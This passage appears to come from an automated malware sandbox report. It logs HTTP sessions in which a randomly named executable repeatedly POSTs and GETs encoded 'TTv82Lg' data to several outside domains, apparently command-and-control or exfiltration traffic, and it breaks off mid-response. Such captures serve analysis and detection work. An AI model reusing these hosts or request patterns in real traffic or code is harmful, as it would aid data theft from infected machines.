                                      Data Ascii: TTv82Lg=uk1x/TEAJt0ttONjJmlXTq8ylEuHLGIPDWu/tTgbz+dBcyOZXdPUyv0PJIaylkF9i++LOwDdaKBk+lHHvxWiMsHWkostzM3JwwoJjzN7gn0zLd+xlxc6FLF1bBIxgfllxsErlW1Yzcn32K8kciS0C2jep1BjyIkTyDO8ExOCNPpASEaPpNXLfuMaekt0CE/emzDJqsSouc6u590wxUIRlqFiCBXg
                                      Jun 10, 2024 10:21:34.845151901 CEST | 146 | IN | HTTP/1.1 404 Not Found
                                      Content-Type: text/plain
                                      Date: Mon, 10 Jun 2024 08:21:34 GMT
                                      Content-Length: 18
                                      Connection: close
                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                      Data Ascii: 404 page not found


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      11 | 192.168.2.5 | 51377 | 116.213.43.190 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:36.323021889 CEST | 1748 | OUT | POST /a472/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.binpvae.lol
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.binpvae.lol
                                      Referer: http://www.binpvae.lol/a472/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg= [TRUNCATED]
                                      Jun 10, 2024 10:21:37.434442997 CEST | 146 | IN | HTTP/1.1 404 Not Found
                                      Content-Type: text/plain
                                      Date: Mon, 10 Jun 2024 08:21:37 GMT
                                      Content-Length: 18
                                      Connection: close
                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                      Data Ascii: 404 page not found


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      12 | 192.168.2.5 | 51378 | 116.213.43.190 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:39.107621908 CEST | 454 | OUT | GET /a472/?TTv82Lg=jmdR8js2K745w9duG20fYqFnwU+bCGk1cWKHz342ws1XHieKZe3C99dpKKnD83tJkcayHzCeZ9pypijZiF65Efqxzc0IleT34n8kjQ1m2nEIGr+ujgw0M5ErIDQmrZA0lA==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.binpvae.lol
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:21:40.262609005 CEST | 146 | IN | HTTP/1.1 404 Not Found
                                      Content-Type: text/plain
                                      Date: Mon, 10 Jun 2024 08:21:39 GMT
                                      Content-Length: 18
                                      Connection: close
                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                      Data Ascii: 404 page not found


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      13 | 192.168.2.5 | 51379 | 102.222.124.13 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:45.341546059 CEST | 708 | OUT | POST /6tsi/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.duzane.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.duzane.com
                                      Referer: http://www.duzane.com/6tsi/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=604gVh/lGubfzOMTHLbTMESHkyTxWCHf7xfYxQc6Xb/5FTZQI1kA7HpljzXoEbh8UnRDxCDSf7Usm4I2L0yKBIUHjWi7dcNS2zS5x0azBzXse+di4zaR9fjfR2D2auzQPKAs7ucBfopvjzYJRa0WSPDkCboJk+g9gS+owtNRCjw9qNrwDw11njylVOwtCIh/tUzceaI=
                                      Jun 10, 2024 10:21:46.481997967 CEST | 990 | IN | HTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      content-type: text/html
                                      content-length: 795
                                      date: Mon, 10 Jun 2024 08:21:45 GMT
                                      server: LiteSpeed
                                      location: https://www.duzane.com/6tsi/
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      14 | 192.168.2.5 | 51380 | 102.222.124.13 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:47.876007080 CEST | 728 | OUT | POST /6tsi/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.duzane.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.duzane.com
                                      Referer: http://www.duzane.com/6tsi/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=604gVh/lGubfh/8TFsvTKkSErSTxfiHb7xTYxV9hUtP5FyFQPEkA8HplsTXpc7hNUnd9xAXSf7Asm542LDmJDYUFq2i5Q8NS2zS5x0OVBzPsfONi5SaS3/jcFmD2euzMPKAK7r0nfrRvjyIJSL0ZcPDmN7pXvuNMoBmxwuRQcAo0mbGaZS9d0DedFd4aT4AW33jsANebluphpCptYGiY8w3mtMmP
                                      Jun 10, 2024 10:21:49.008356094 CEST | 990 | IN | HTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      content-type: text/html
                                      content-length: 795
                                      date: Mon, 10 Jun 2024 08:21:48 GMT
                                      server: LiteSpeed
                                      location: https://www.duzane.com/6tsi/
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      15 | 192.168.2.5 | 51381 | 102.222.124.13 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:50.415906906 CEST | 1745 | OUT | POST /6tsi/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.duzane.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.duzane.com
                                      Referer: http://www.duzane.com/6tsi/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg= [TRUNCATED]
                                      Jun 10, 2024 10:21:51.753051043 CEST | 990 | IN | HTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      content-type: text/html
                                      content-length: 795
                                      date: Mon, 10 Jun 2024 08:21:51 GMT
                                      server: LiteSpeed
                                      location: https://www.duzane.com/6tsi/
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      16 | 192.168.2.5 | 51382 | 102.222.124.13 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:52.948385000 CEST | 453 | OUT | GET /6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.duzane.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:21:54.076908112 CEST | 1144 | IN | HTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      content-type: text/html
                                      content-length: 795
                                      date: Mon, 10 Jun 2024 08:21:53 GMT
                                      server: LiteSpeed
                                      location: https://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                      Jun 10, 2024 10:21:54.331718922 CEST | 1144 | IN | HTTP/1.1 301 Moved Permanently
                                      Connection: close
                                      content-type: text/html
                                      content-length: 795
                                      date: Mon, 10 Jun 2024 08:21:53 GMT
                                      server: LiteSpeed
                                      location: https://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      17 | 192.168.2.5 | 51383 | 35.241.34.216 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:21:59.696134090 CEST | 708 | OUT | POST /2c61/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.mg55aa.xyz
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.mg55aa.xyz
                                      Referer: http://www.mg55aa.xyz/2c61/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=cL3y7Y06Zvfs3zPrKXec5pmRI2fR7KQamD9YBb+HlLXTnhzoBK66MaFvn4RzPIQGTteigEyXm1BVa7KT5TGizUXAbgETQWrRz8B6f3Aln3yiKW4+snqrgBtqasf9hFnzo5IHeoYztzYNw2yStczUqtAuV2HibyrQ3ESk5NOdeRDv4QAJ6pUYMXGulBa5Y9M353+djJc=
                                      Jun 10, 2024 10:22:00.448599100 CEST | 326 | IN | HTTP/1.1 405 Not Allowed
                                      Server: nginx/1.20.2
                                      Date: Mon, 10 Jun 2024 08:22:00 GMT
                                      Content-Type: text/html
                                      Content-Length: 157
                                      Via: 1.1 google
                                      Connection: close
                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      18 | 192.168.2.5 | 51384 | 35.241.34.216 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:02.245327950 CEST | 728 | OUT | POST /2c61/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.mg55aa.xyz
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.mg55aa.xyz
                                      Referer: http://www.mg55aa.xyz/2c61/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=cL3y7Y06Zvfs2S/rFQyco5mSUmfRwqQemD5YBaqXl9vTpgDoAL66FKFv+IR2QYQBTtCqgFOXm1FVa66T6iGhxEXCAQEVa2rRz8B6f3UPn0CiNmo+vGqk/xtpdsf931m0o5Ixep0Kt1UNwz2StNzXgtAsImHwYDqL9FO30MnkfnKUwGtjgLcwf3qW1SSOJNtejUut9eLeYDarb1K3GbTxQX4ithl+
                                      Jun 10, 2024 10:22:03.012447119 CEST | 326 | IN | HTTP/1.1 405 Not Allowed
                                      Server: nginx/1.20.2
                                      Date: Mon, 10 Jun 2024 08:22:02 GMT
                                      Content-Type: text/html
                                      Content-Length: 157
                                      Via: 1.1 google
                                      Connection: close
                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      19 | 192.168.2.5 | 51385 | 35.241.34.216 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:04.777486086 CEST | 1745 | OUT | POST /2c61/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.mg55aa.xyz
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.mg55aa.xyz
                                      Referer: http://www.mg55aa.xyz/2c61/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg= [TRUNCATED]
                                      Jun 10, 2024 10:22:05.536735058 CEST | 326 | IN | HTTP/1.1 405 Not Allowed
                                      Server: nginx/1.20.2
                                      Date: Mon, 10 Jun 2024 08:22:05 GMT
                                      Content-Type: text/html
                                      Content-Length: 157
                                      Via: 1.1 google
                                      Connection: close
                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      20 | 192.168.2.5 | 51386 | 35.241.34.216 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:07.327341080 CEST | 453 | OUT | GET /2c61/?TTv82Lg=RJfS4vARZYm/oi22NSuVxsKXUXvAzLUuwV1pBI27iejWxHvYHo2LN7gu8qRYW6QqNtSAiHHGlyBTLaey7TeG8lKmZ3wdB0uWw8RQPkcPoCC9P3J1+WeEqjNfAM7KpTz+0w==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.mg55aa.xyz
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:22:08.098787069 CEST | 1236 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.20.2
                                      Date: Mon, 10 Jun 2024 08:22:07 GMT
                                      Content-Type: text/html
                                      Content-Length: 5161
                                      Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                      Vary: Accept-Encoding
                                      ETag: "65a4939c-1429"
                                      Cache-Control: no-cache
                                      Accept-Ranges: bytes
                                      Via: 1.1 google
                                      Connection: close
                                      Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("s
                                      Jun 10, 2024 10:22:08.098803043 CEST | 1236 | IN
                                      Data Ascii: cript")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc"
                                      Jun 10, 2024 10:22:08.098814011 CEST | 356 | IN
                                      Data Ascii: avigator.userAgent,isUC:e(),isQuark:r(),is_duannei:e()||r()},n),t=[];for(var i in a)a.hasOwnProperty(i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://t
                                      Jun 10, 2024 10:22:08.102224112 CEST | 1236 | IN
                                      Data Ascii: "===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&
                                      Jun 10, 2024 10:22:08.102235079 CEST | 1236 | IN
                                      Data Ascii: min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"
                                      Jun 10, 2024 10:22:08.102243900 CEST | 161 | IN
                                      Data Ascii: </div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      21 | 192.168.2.5 | 51387 | 176.113.70.180 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:13.955416918 CEST | 720 | OUT | POST /3osa/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.ie8mce.website
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.ie8mce.website
                                      Referer: http://www.ie8mce.website/3osa/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=Nzj1No0ZT/WKuDutyByjyl0sTzAXu+RWu5eYS917IWG7LHAC4TExcrjXyDn4wNp+ryvUCxBsTG5dpnepOkkI3bKGnwx8L5qZJzNzNZP/XI5uMb2nOf+N07uWvpfbE7V6QVGREDdKxa13JsyPNKlhGWJdzzAug0RFOPnR3/m3YPBAYTdmyWvx+sudk9gJ1UzdcZ62m+8=
                                      Jun 10, 2024 10:22:15.057029963 CEST | 570 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Mon, 10 Jun 2024 08:22:14 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      22 | 192.168.2.5 | 51388 | 176.113.70.180 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:16.658775091 CEST | 740 | OUT | POST /3osa/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.ie8mce.website
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.ie8mce.website
                                      Referer: http://www.ie8mce.website/3osa/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=Nzj1No0ZT/WK0jetwgyjlV0vNjAXkeRSu5SYS8xrIli7MlIC7XoxM7jXqTn9+tplryqpC05sTCpdplGpPX8PlbK++gx+FZqZJzNzNZaYXMVuNoenP++C+buVlJfbSLUzQVGvECxgxY93Ju6PNYdgNWJHtzBAwkMyBsnt+9PYONZpdlwMo0nZtMCl0uo+kkS0G6qG4ppHtG3/RFUfsC6J2HOI5pbr
                                      Jun 10, 2024 10:22:17.611334085 CEST | 570 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Mon, 10 Jun 2024 08:22:17 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      23 | 192.168.2.5 | 51389 | 176.113.70.180 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:19.196017981 CEST | 1757 | OUT | POST /3osa/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.ie8mce.website
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.ie8mce.website
                                      Referer: http://www.ie8mce.website/3osa/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg= [TRUNCATED]
                                      Jun 10, 2024 10:22:20.139576912 CEST | 570 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Mon, 10 Jun 2024 08:22:19 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      24 | 192.168.2.5 | 51390 | 176.113.70.180 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:22:21.730110884 CEST | 457 | OUT | GET /3osa/?kH=00U8ENLHk&TTv82Lg=AxLVOe86WIqquROk4wW2qAARSAB2s4BJoZSnRO1SGEf+ewBgrgY/U4+QoHX9+oVsrlzSfgcLZGl64XyGJnoqgpfIm3dacYKZHld6caimAIQJPM6fBdCSw8qvz7rbMrI9Lg== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.ie8mce.website
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:22:22.838048935 CEST | 686 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Mon, 10 Jun 2024 08:22:22 GMT
